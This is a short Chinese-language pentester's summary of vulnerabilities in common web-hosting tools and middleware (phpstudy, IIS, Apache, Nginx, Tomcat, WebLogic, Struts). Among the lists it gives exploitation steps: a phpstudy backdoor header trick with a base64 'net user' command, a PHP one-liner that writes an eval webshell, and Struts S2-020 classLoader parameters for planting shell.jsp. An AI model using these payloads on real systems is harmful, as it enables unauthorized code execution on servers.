web建站漏洞总结
windows主流建站工具
宝塔
护卫神
phpstudy
upupw
phpstudy
phpstudy两个版本后门漏洞php-5.4.45与php-5.2.17两个版本
利用方法
请求包中Accept-Encoding: gzip, deflate,将gzip,deflate中间的空格删掉
Accept-Charset:+所执行命令的base64编码
如
c3lzdGVtKCduZXQgdXNlcicpOw==
一句话木马利用
修改蚁剑内的请求信息,处Header头修改如图下
即可连接
十大中间件漏洞类型总结
1.)IIS漏洞
1、PUT漏洞
2、短文件名猜解
3、远程代码执行
4、解析漏洞
IIS6.0 目录解析漏洞和文件解析漏洞;后面的不会处理因为可以进行构造.asp;.jpg 默认解析asp,asa,cer,cdx
IIS7.0 1.jpg/1.php进行解析 默认会当作
原因:配置文件的问题
跟木马有关系,如果是shell.php类即后面的名字设置为shell.php
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
1.jpg/shell.php
2.)Apache漏洞
1、解析漏洞-->原理解析不了后面的后缀后即会往做解析内容导致-->从左往右进行解析导致
原因-->httpd.conf的配置文件出问题导致
2、目录遍历
3.)Niginx漏洞
1、文件解析
2、目录遍历
3、CRLF注入
4、目录穿越
4.)tomcat漏洞
1、远程代码执行
2、war后门文件部署
weblogic漏洞总结
5.)jboss漏洞
1、反序列化漏洞
2、war后门文件部署
6.)weblogic漏洞
1、反序列化漏洞
2、SSRF
3、任意文件上传
4、war后门文件部署
7.)strtuts漏洞
s2-020漏洞
原理:通过class.classLoader进行修改tomcat配置,以达到getshell的目的
常见组合拳
更改路径为日志的路径,然后结合日志记录的状况拿到shell
如
①class.classLoader.resources.context.parent.pipline.first.directory=wbeapps/ROOT
-->即修改为网站的根目录
②把日志的后缀修改为.jsp
class.classLoader.resources.context.parent.pipline.first.suffix=.jsp
③把日志的名字修改为shell
class.classLoader.resources.context.parent.pipline.first.prefix=.jsp
然后访问shell.jsp即可拿到shell
8.)java string 漏洞
9.)python
10.)其余组件的漏洞
1、FastCGI未授权访问、任意命令执行
2、PHPCGI远程代码执行